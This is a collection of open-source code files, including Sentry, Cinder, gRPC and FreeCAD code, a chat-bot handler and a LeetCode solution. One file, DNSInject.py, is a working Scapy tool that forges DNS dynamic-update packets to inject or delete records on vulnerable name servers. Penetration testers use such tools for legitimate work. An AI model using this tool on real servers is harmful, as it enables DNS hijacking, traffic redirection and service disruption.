'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']", 'null': 'True'})
},
u'sentry.alert': {
'Meta': {'object_name': 'Alert'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'related_groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_alerts'", 'symmetrical': 'False', 'through': u"orm['sentry.AlertRelatedGroup']", 'to': u"orm['sentry.Group']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
u'sentry.alertrelatedgroup': {
'Meta': {'unique_together': "(('group', 'alert'),)", 'object_name': 'AlertRelatedGroup'},
'alert': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Alert']"}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
u'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.Ch
|
rickerc/cinder_audit
|
cinder/openstack/common/scheduler/weights/__init__.py
|
Python
|
apache-2.0
| 1,305
| 0
|
# Copyright (c) 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Scheduler host weights
"""
from cinder.openstack.common.scheduler import weight
class WeighedHost(weight.WeighedObject):
def to_dict(self):
return {
'weight': self.weight,
'host': self.obj.host,
}
def __repr__(self):
return ("WeighedHost [host: %s, weight: %s]" %
(self.obj.host, self.weight))
class BaseHostWeigher(weight.BaseWeigher):
"""Base class for host weights."""
pass
class HostWeightHandler(weight.BaseWeightHandler):
object_class = WeighedHost
def __init__(self, namespace):
super(HostWeightHandler, self).__init__(BaseHostWeigher, namespace)
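A sketch of how this handler is meant to be used: subclass BaseHostWeigher and let HostWeightHandler load it from a plugin namespace. The _weigh_object hook and the namespace string below are assumptions drawn from other OpenStack weight handlers, not from this file:

class FreeCapacityWeigher(BaseHostWeigher):
    def _weigh_object(self, host_state, weight_properties):
        # assumed convention: a larger value means a more attractive host
        return getattr(host_state, 'free_capacity_gb', 0.0)

handler = HostWeightHandler('cinder.scheduler.weights')  # namespace is illustrative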
|
kidaa/kythe
|
third_party/grpc/src/python/src/grpc/framework/foundation/_timer_future.py
|
Python
|
apache-2.0
| 6,903
| 0.01101
|
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Affords a Future implementation based on Python's threading.Timer."""
import sys
import threading
import time
from grpc.framework.foundation import future
class TimerFuture(future.Future):
"""A Future implementation based around Timer objects."""
def __init__(self, compute_time, computation):
"""Constructor.
Args:
compute_time: The time after which to begin this future's computation.
computation: The computation to be performed within this Future.
"""
self._lock = threading.Lock()
self._compute_time = compute_time
self._computation = computation
self._timer = None
self._computing = False
self._computed = False
self._cancelled = False
self._return_value = None
self._exception = None
self._traceback = None
self._waiting = []
def _compute(self):
"""Performs the computation embedded in this Future.
Or doesn't, if the time to perform it has not yet arrived.
"""
with self._lock:
time_remaining = self._compute_time - time.time()
if 0 < time_remaining:
self._timer = threading.Timer(time_remaining, self._compute)
self._timer.start()
return
else:
self._computing = True
try:
return_value = self._computation()
exception = None
traceback = None
except Exception as e: # pylint: disable=broad-except
return_value = None
exception = e
traceback = sys.exc_info()[2]
with self._lock:
self._computing = False
self._computed = True
self._return_value = return_value
self._exception = exception
self._traceback = traceback
waiting = self._waiting
for callback in waiting:
callback(self)
def start(self):
"""Starts this Future.
This must be called exactly once, immediately after construction.
"""
with self._lock:
self._timer = threading.Timer(
self._compute_time - time.time(), self._compute)
self._timer.start()
def cancel(self):
"""See future.Future.cancel for specification."""
with self._lock:
if self._computing or self._computed:
return False
elif self._cancelled:
return True
else:
self._timer.cancel()
self._cancelled = True
waiting = self._waiting
for callback in waiting:
try:
callback(self)
except Exception: # pylint: disable=broad-except
pass
return True
def cancelled(self):
"""See future.Future.cancelled for specification."""
with self._lock:
return self._cancelled
def running(self):
"""See future.Future.running for specification."""
with self._lock:
return not self._computed and not self._cancelled
def done(self):
"""See future.Future.done for specification."""
with self._lock:
return self._computed or self._cancelled
def result(self, timeout=None):
"""See future.Future.result for specification."""
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
if self._exception is None:
return self._return_value
else:
raise self._exception # pylint: disable=raising-bad-type
condition = threading.Condition()
def notify_condition(unused_future):
with condition:
condition.notify()
self._waiting.append(notify_condition)
with condition:
condition.wait(timeout=timeout)
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
if self._exception is None:
return self._return_value
else:
raise self._exception # pylint: disable=raising-bad-type
else:
raise future.TimeoutError()
def exception(self, timeout=None):
"""See future.Future.exception for specification."""
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._exception
condition = threading.Condition()
def notify_condition(unused_future):
with condition:
condition.notify()
self._waiting.append(notify_condition)
with condition:
condition.wait(timeout=timeout)
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._exception
else:
raise future.TimeoutError()
def traceback(self, timeout=None):
"""See future.Future.traceback for specification."""
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._traceback
condition = threading.Condition()
def notify_condition(unused_future):
with condition:
condition.notify()
self._waiting.append(notify_condition)
with condition:
condition.wait(timeout=timeout)
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._traceback
else:
raise future.TimeoutError()
def add_done_callback(self, fn):
"""See future.Future.add_done_callback for specification."""
with self._lock:
if not self._computed and not self._cancelled:
self._waiting.append(fn)
return
fn(self)
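A minimal usage sketch based only on the class above: schedule a computation half a second in the future and block on its result.

import time

def _answer():
    return 6 * 7

f = TimerFuture(time.time() + 0.5, _answer)
f.start()          # must be called exactly once, right after construction
print(f.result())  # blocks until the timer fires, then prints 42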
|
CloudServer/cinder
|
cinder/tests/unit/api/test_common.py
|
Python
|
apache-2.0
| 24,477
| 0
|
# Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Test suites for 'common' code used throughout the OpenStack HTTP API.
"""
import mock
from testtools import matchers
import webob
import webob.exc
from cinder.api import common
from cinder import test
NS = "{http://docs.openstack.org/compute/api/v1.1}"
ATOMNS = "{http://www.w3.org/2005/Atom}"
class LimiterTest(test.TestCase):
"""Unit tests for the `cinder.api.common.limited` method.
This method takes in a list of items and, depending on the 'offset'
and 'limit' GET params, returns a subset or complete set of the given
items.
"""
def setUp(self):
"""Run before each test."""
super(LimiterTest, self).setUp()
self.tiny = range(1)
self.small = range(10)
self.medium = range(1000)
self.large = range(10000)
def test_limiter_offset_zero(self):
"""Test offset key works with 0."""
req = webob.Request.blank('/?offset=0')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_offset_medium(self):
"""Test offset key works with a medium sized number."""
req = webob.Request.blank('/?offset=10')
self.assertEqual(common.limited(self.tiny, req), [])
self.assertEqual(common.limited(self.small, req), self.small[10:])
self.assertEqual(common.limited(self.medium, req), self.medium[10:])
self.assertEqual(common.limited(self.large, req), self.large[10:1010])
def test_limiter_offset_over_max(self):
"""Test offset key works with a number over 1000 (max_limit)."""
req = webob.Request.blank('/?offset=1001')
self.assertEqual([], common.limited(self.tiny, req))
self.assertEqual([], common.limited(self.small, req))
self.assertEqual([], common.limited(self.medium, req))
self.assertEqual(
common.limited(self.large, req), self.large[1001:2001])
def test_limiter_offset_blank(self):
"""Test offset key works with a blank offset."""
req = webob.Request.blank('/?offset=')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_offset_bad(self):
"""Test offset key works with a BAD offset."""
req = webob.Request.blank(u'/?offset=\u0020aa')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_nothing(self):
"""Test request with no offset or limit."""
req = webob.Request.blank('/')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_limit_zero(self):
"""Test limit of zero."""
req = webob.Request.blank('/?limit=0')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_limit_bad(self):
"""Test with a bad limit."""
req = webob.Request.blank(u'/?limit=hello')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_limit_medium(self):
"""Test limit of 10."""
req = webob.Request.blank('/?limit=10')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium[:10])
self.assertEqual(common.limited(self.large, req), self.large[:10])
def test_limiter_limit_over_max(self):
"""Test limit of 3000."""
req = webob.Request.blank('/?limit=3000')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_limit_and_offset(self):
"""Test request with both limit and offset."""
items = range(2000)
req = webob.Request.blank('/?offset=1&limit=3')
self.assertEqual(common.limited(items, req), items[1:4])
req = webob.Request.blank('/?offset=3&limit=0')
self.assertEqual(common.limited(items, req), items[3:1003])
req = webob.Request.blank('/?offset=3&limit=1500')
self.assertEqual(common.limited(items, req), items[3:1003])
req = webob.Request.blank('/?offset=3000&limit=10')
self.assertEqual(common.limited(items, req), [])
def test_limiter_custom_max_limit(self):
"""Test a max_limit other than 1000."""
items = range(2000)
req = webob.Request.blank('/?offset=1&limit=3')
self.assertEqual(
common.limited(items, req, max_limit=2000), items[1:4])
req = webob.Request.blank('/?offset=3&limit=0')
self.assertEqual(
common.limited(items, req, max_limit=2000), items[3:])
req = webob.Request.blank('/?offset=3&limit=2500')
self.assertEqual(
common.limited(items, req, max_limit=2000), items[3:])
req = webob.Request.blank('/?offset=3000&limit=10')
self.assertEqual(common.limited(items, req, max_limit=2000), [])
def test_limiter_negative_limit(self):
"""Test a negative limit."""
req = webob.Request.blank('/?limit=-3000')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_negative_offset(self):
"""Test a negative offset."""
req = webob.Request.blank('/?offset=-30')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
class PaginationParamsTest(test.TestCase):
"""Unit tests for `cinder.api.common.get_pagination_params` method.
This method takes in a request object and returns 'marker' and 'limit'
GET params.
"""
def test_nonnumerical_limit(self):
"""Test nonnumerical limit param."""
req = webob.Request.blank('/?limit=hello')
self.assertRaises(
webob.exc.HTTPBadRequest, common.get_pagination_params, req)
def test_no_params(self):
"""Test no params."""
req = webob.Request.blank('/')
self.assertEqual({}, common.get_pagination_params(req))
def test_valid_marker(self):
"""Test valid marker param."""
req = webob.Request.blank(
'/?marker=263abb28-1de6-412f-b00b-f0ee0c4333c2')
self.assertEqual({'marker': '263abb28-1de6-412f-b00b-f0ee0c4333c2'},
common.get_pagination_params(req))
def test_valid_limit(self):
"""Test valid limit param."""
req = webob.Request.blank('/?limit=10')
self.assertEqual({'limit': 10}, common.get_pagination_params(req))
def test_invalid_limit(self):
"""Test invalid limit param."""
req = webob.Request.blank('/?limit=-2')
self.assertRaises(
webob.exc.HTTPBadRequest, common.get_pagination_params, req)
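Taken together, the LimiterTest cases pin down the contract of common.limited. A sketch that satisfies them (inferred from the tests, not the actual cinder implementation):

import webob.exc

def limited_sketch(items, request, max_limit=1000):
    try:
        offset = int(request.GET.get('offset', 0))
        limit = int(request.GET.get('limit', max_limit))
    except ValueError:
        raise webob.exc.HTTPBadRequest()
    if offset < 0 or limit < 0:
        raise webob.exc.HTTPBadRequest()
    limit = min(max_limit, limit or max_limit)  # limit=0 falls back to max_limit
    return items[offset:offset + limit]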
|
EthanGuo/regular-ticket-task
|
worker.py
|
Python
|
mit
| 325
| 0.003077
|
# -*-coding: utf-8-*-
from celery import Celery
from op import utils
import celeryconfig
worker = Celery('Regular-Ticket-Task')
worker.config_from_object(celeryconfig)
worker.conf.BROKER_URL = utils.get_config('celery', 'BROKER_URL')
worker.conf.CELERY_RESULT_BACKEND = utils.get_config('celery', 'CELERY_RESULT_BACKEND')
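A hypothetical task registered on this app, to show the intended usage (the task name and body are illustrative only):

@worker.task
def ping():
    return 'pong'

# e.g. ping.delay() once a celery worker is running against the configured broker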
|
TLemur/freq-bot
|
src/plugins/help/help_handler.py
|
Python
|
gpl-3.0
| 2,586
| 0.023975
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
#~#######################################################################
#~ Copyright (c) 2008 Burdakov Daniel <kreved@kreved.org> #
#~ #
#~ This file is part of FreQ-bot. #
#~ #
#~ FreQ-bot is free software: you can redistribute it and/or modify #
#~ it under the terms of the GNU General Public License as published by #
#~ the Free Software Foundation, either version 3 of the License, or #
#~ (at your option) any later version. #
#~ #
#~ FreQ-bot is distributed in the hope that it will be useful, #
#~ but WITHOUT ANY WARRANTY; without even the implied warranty of #
#~ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
#~ GNU General Public License for more details. #
#~ #
#~ You should have received a copy of the GNU General Public License #
#~ along with FreQ-bot. If not, see <http://www.gnu.org/licenses/>. #
#~#######################################################################
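# NOTE: re, lang, bot, HELP_CATEGORIES, HELP_LANGS and load_help_content are not
# defined in this file; they are assumed to be injected into the plugin's
# namespace by the FreQ-bot plugin loader.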
def help_handler(t, s, p):
p = p.strip()
q = re.search('^(\-..\ )?\.?(.+)$', p)
if q:
rlang = q.groups()[0]
if rlang: rlang = rlang[1:3]
else: rlang = lang.getLang(s.jid)
p = q.groups()[1]
if p.startswith('.'): p = p[1:]
else:
rlang = lang.getLang(s.jid)
p = ''
if p:
if p.startswith('.'): p = p[1:]
if p in HELP_CATEGORIES:
answer = HELP_CATEGORIES[p]
answer.sort()
answer = ', '.join(answer)
s.lmsg(t, 'help_category', answer)
else:
if p in HELP_LANGS:
q = HELP_LANGS[p]
if rlang in q:
content = load_help_content(p, rlang)
categories = ', '.join([w for w in HELP_CATEGORIES.keys() if p in HELP_CATEGORIES[w]])
s.lmsg(t, 'help_show', categories, content)
else:
languages = HELP_LANGS[p]
languages = ["'.help -%s %s'" % (w, p) for w in languages]
s.lmsg(t, 'help_other_languages', p, rlang, ', '.join(languages))
else: s.lmsg(t, 'help_not_found', p)
else:
ans = ['%s(%s)' % (w, len(HELP_CATEGORIES[w])) for w in HELP_CATEGORIES.keys()]
ans.sort()
categories = ', '.join(ans)
s.lmsg(t, 'help_categories', categories)
bot.register_cmd_handler(help_handler, '.help')
bot.register_cmd_handler(help_handler, 'help')
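For clarity, here is what the option-parsing regex above captures (a quick check, assuming re is available as noted above):

q = re.search('^(\-..\ )?\.?(.+)$', '-en kick')
assert q.groups() == ('-en ', 'kick')  # rlang becomes 'en', the help topic 'kick'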
|
ChrisTruncer/PenTestScripts
|
HostScripts/DNSInject.py
|
Python
|
gpl-3.0
| 4,615
| 0.002384
|
#!/usr/bin/env python
# by Chris Truncer
# Script to attempt to forge a packet that will inject a new value
# for a dns record. Check nessus plugin #35372
# Some great documentation and sample code came from:
# http://bb.secdev.org/scapy/src/46e0b3e619547631d704c133a0247cf4683c0784/scapy/layers/dns.py
import argparse
import logging
# I know it's bad practice to add code up here, but it's the only way I could
# see to suppress the IPv6 warning from scapy (By setting this
# before importing scapy).
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import os
from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, sr1
import sys
def add_a_record(name_server, new_dns_record, ip_value):
os.system('clear')
title()
# Verifying all required options have a populated value
if name_server is None or new_dns_record is None or ip_value is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record injection..."
print "[*] Sending DNS packet adding " + new_dns_record
print "[*] and pointing it to " + ip_value + "\n"
dns_zone = new_dns_record[new_dns_record.find(".")+1:]
# Craft the packet with scapy
add_packet = sr1(IP(dst=name_server)/UDP()/DNS(
opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[DNSRR(rrname=new_dns_record,
type="A", ttl=120, rdata=ip_value)]))
print add_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def cli_parser():
# Command line argument parser
parser = argparse.ArgumentParser(
add_help=False,
description="DNSInject is a tool for modifying DNS records on vulnerable servers.")
parser.add_argument(
"--add", action='store_true',
help="Add \"A\" record to the vulnerable name server.")
parser.add_argument(
"--delete", action='store_true',
help="Delete \"A\" record from the vulnerable name server.")
parser.add_argument(
"-ns", metavar="ns1.test.com",
help="Nameserver to execute the specified action.")
parser.add_argument(
"-d", metavar="mynewarecord.test.com",
help="Domain name to create an A record for.")
parser.add_argument(
"-ip", metavar="192.168.1.1",
help="IP Address the new record will point to.")
parser.add_argument(
'-h', '-?', '--h', '-help', '--help', action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.h:
parser.print_help()
sys.exit()
return args.add, args.delete, args.ns, args.d, args.ip
def delete_dns_record(del_ns, del_record):
os.system('clear')
title()
# Verifying all required options have a populated value
if del_ns is None or del_record is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record deletion..."
print "[*] Sending packet which deletes the following record: "
print "[*] " + del_record + "\n"
dns_zone = del_record[del_record.find(".")+1:]
del_packet = sr1(IP(dst=del_ns)/UDP()/DNS(
opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[DNSRR(rrname=del_record, type="ALL",
rclass="ANY", ttl=0, rdata="")]))
print del_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def title():
print "######################################################################"
print "# DNS Injector #"
print "######################################################################\n"
return
if __name__ == '__main__':
# Parse command line arguments
action_add, action_delete, dns_nameserver, dns_record, dns_ip = cli_parser()
# Choose function based on action variable value
try:
if action_add:
add_a_record(dns_nameserver, dns_record, dns_ip)
elif action_delete:
delete_dns_record(dns_nameserver, dns_record)
else:
print "[*] ERROR: You didn't provide a valid action."
print "[*] ERROR: Restart and provide your desired action!"
sys.exit()
except AttributeError:
os.system('clear')
title()
print "[*] ERROR: You didn't provide a valid action."
print "[*] ERROR: Restart and provide your desired action!"
|
mateusportal/portalconta
|
empresas/forms.py
|
Python
|
gpl-2.0
| 537
| 0.007449
|
from django import forms
from empresas.models import Usuario, Pessoa, Empresa
class LoginForm(forms.Form):
username = forms.CharField(max_length='200', required=True)
password = forms.CharField(widget=forms.PasswordInput, required=True)
class UsuarioForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput)
class Meta:
model = Usuario
class PessoaForm(forms.ModelForm):
class Meta:
model = Pessoa
class EmpresaForm(forms.ModelForm):
class Meta:
model = Empresa
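A quick validation sketch for LoginForm, using the field names defined above (assumes it runs inside a configured Django project):

form = LoginForm({'username': 'alice', 'password': 's3cret'})
assert form.is_valid()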
|
JulyKikuAkita/PythonPrac
|
cs15211/ConvertANumberToHexadecimal.py
|
Python
|
apache-2.0
| 4,592
| 0.004138
|
__source__ = ''
# https://github.com/kamyu104/LeetCode/blob/master/Python/convert-a-number-to-hexadecimal.py
# Time: O(logn)
# Space: O(1)
#
# Description:
#
# Given an integer, write an algorithm to convert it to hexadecimal.
# For negative integer, two's complement method is used.
#
# IMPORTANT:
# You must not use any method provided by the library which converts/formats
# the number to hex directly. Such solution will result in disqualification of
# all your submissions to this problem. Users may report such solutions after the
# contest ends and we reserve the right of final decision and interpretation
# in the case of reported solutions.
#
# Note:
#
# All letters in hexadecimal (a-f) must be in lowercase.
# The hexadecimal string must not contain extra leading 0s. If the number is zero,
# it is represented by a single zero character '0'; otherwise,
# the first character in the hexadecimal string will not be the zero character.
# The given number is guaranteed to fit within the range of a 32-bit signed integer.
# You must not use any method provided by the library which converts/formats the number to hex directly.
# Example 1:
#
# Input:
# 26
#
# Output:
# "1a"
# Example 2:
#
# Input:
# -1
#
# Output:
# "ffffffff"
# Bit Manipulation
import unittest
# 20ms 98.60%
class Solution(object):
def toHex(self, num):
return ''.join('0123456789abcdef'[(num >> 4 * i) & 15]
for i in range(8)
)[::-1].lstrip('0') or '0'
def toHex2(self, num):
"""
:type num: int
:rtype: str
"""
if not num:
return "0"
res = []
while num and len(res) != 8:
h = num & 15
if h < 10:
res.append(str(chr(ord('0') + h)))
else:
res.append(str(chr(ord('a') + h - 10)))
num >>= 4
res.reverse()
return "".join(res)
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# https://ratchapong.com/algorithm-practice/leetcode/convert-a-number-to-hexadecimal
# Thought: each time we look at the last four bits of the
binary version of the input and map them to a hex char,
then shift the input to the right by 4 bits, and repeat
until the input becomes 0.
# 3ms 100%
class Solution {
public String toHex(int num) {
if (num == 0) return "0";
char[] map = new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
StringBuilder sb = new StringBuilder();
while (num != 0) {
sb.insert(0, map[num & 0b1111]);
num = num >>> 4;
}
return sb.toString();
}
}
Worst Case
O(logb(n)): with respect to the input, the running time always depends on the size of the input.
Extra space is needed to store the equivalent base-16 string.
Approach: Shifting and Masking
Number is masked against binary of 1111 each time to get the component value
which is then mapped to the corresponding character. >>> is used to right-shift
4 bit positions with zero-extension. The zero-extension naturally deals with negative numbers.
StringBuilder is used due to its efficiency in inserting characters into an existing StringBuilder object.
If a normal String were used, each insertion by the + operation
would have to copy over the immutable String object, which is highly inefficient.
The iterations last longest for Integer.MAX_VALUE, Integer.MIN_VALUE, or any input
with 8 hexadecimal characters; for Integer.MAX_VALUE the algorithm runs
at most log base 16 of (2^31 - 1), plus 1, i.e. 8 times.
# 3ms 100%
class Solution {
public String toHex(int num) {
long n = num & 0x00000000ffffffffL;
char[] map = new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
StringBuilder sb = new StringBuilder();
while (n > 0) {
sb.insert(0, map[(int) (n % 16)]);
n = n / 16;
}
return num == 0 ? "0" : sb.toString();
}
}
Worst Case
O(logb(n)): with respect to the input, the running time always depends on the size of the input.
Extra space is needed to store the equivalent base-16 string.
Approach: Divide and Modding
To deal with negative numbers, the number is masked against the long data type.
This process converts it to a positive long number.
A simple while loop is then used to extract each base digit until the number becomes 0.
'''
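A quick check of the Python solution against the problem's own examples; note that Python's arithmetic right shift keeps -1 >> k == -1, so every one of the eight nibbles masks to 0b1111:

s = Solution()
assert s.toHex(26) == '1a'
assert s.toHex(-1) == 'ffffffff'
assert s.toHex(0) == '0'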
|
bblacey/FreeCAD-MacOS-CI
|
src/Mod/Fem/PyGui/_CommandFemMeshNetgenFromShape.py
|
Python
|
lgpl-2.1
| 3,519
| 0.002273
|
# ***************************************************************************
# * *
# * Copyright (c) 2013-2015 - Juergen Riegel <FreeCAD@juergen-riegel.net> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
__title__ = "Command Mesh Netgen From Shape"
__author__ = "Juergen Riegel"
__url__ = "http://www.freecadweb.org"
## @package CommandFemMeshNetgenFromShape
# \ingroup FEM
import FreeCAD
from FemCommands import FemCommands
import FreeCADGui
import FemGui
from PySide import QtCore
class _CommandFemMeshNetgenFromShape(FemCommands):
# the FEM_MeshNetgenFromShape command definition
def __init__(self):
super(_CommandFemMeshNetgenFromShape, self).__init__()
self.resources = {'Pixmap': 'fem-femmesh-netgen-from-shape',
'MenuText': QtCore.QT_TRANSLATE_NOOP("FEM_MeshFromShape", "FEM mesh from shape by Netgen"),
'ToolTip': QtCore.QT_TRANSLATE_NOOP("FEM_MeshFromShape", "Create a FEM volume mesh from a solid or face shape by Netgen internal mesher")}
self.is_active = 'with_part_feature'
def Activated(self):
FreeCAD.ActiveDocument.openTransaction("Create FEM mesh Netgen")
FreeCADGui.addModule("FemGui")
sel = FreeCADGui.Selection.getSelection()
if (len(sel) == 1):
if(sel[0].isDerivedFrom("Part::Feature")):
FreeCADGui.doCommand("App.activeDocument().addObject('Fem::FemMeshShapeNetgenObject', '" + sel[0].Name + "_Mesh')")
FreeCADGui.doCommand("App.activeDocument().ActiveObject.Shape = App.activeDocument()." + sel[0].Name)
if FemGui.getActiveAnalysis():
FreeCADGui.addModule("FemGui")
FreeCADGui.doCommand("FemGui.getActiveAnalysis().Member = FemGui.getActiveAnalysis().Member + [App.ActiveDocument.ActiveObject]")
FreeCADGui.doCommand("Gui.activeDocument().setEdit(App.ActiveDocument.ActiveObject.Name)")
FreeCADGui.Selection.clearSelection()
FreeCADGui.addCommand('FEM_MeshNetgenFromShape', _CommandFemMeshNetgenFromShape())
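Once registered, the command can also be triggered from the Python console (hypothetical invocation; assumes a document with a Part::Feature is selected):

FreeCADGui.runCommand('FEM_MeshNetgenFromShape')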
|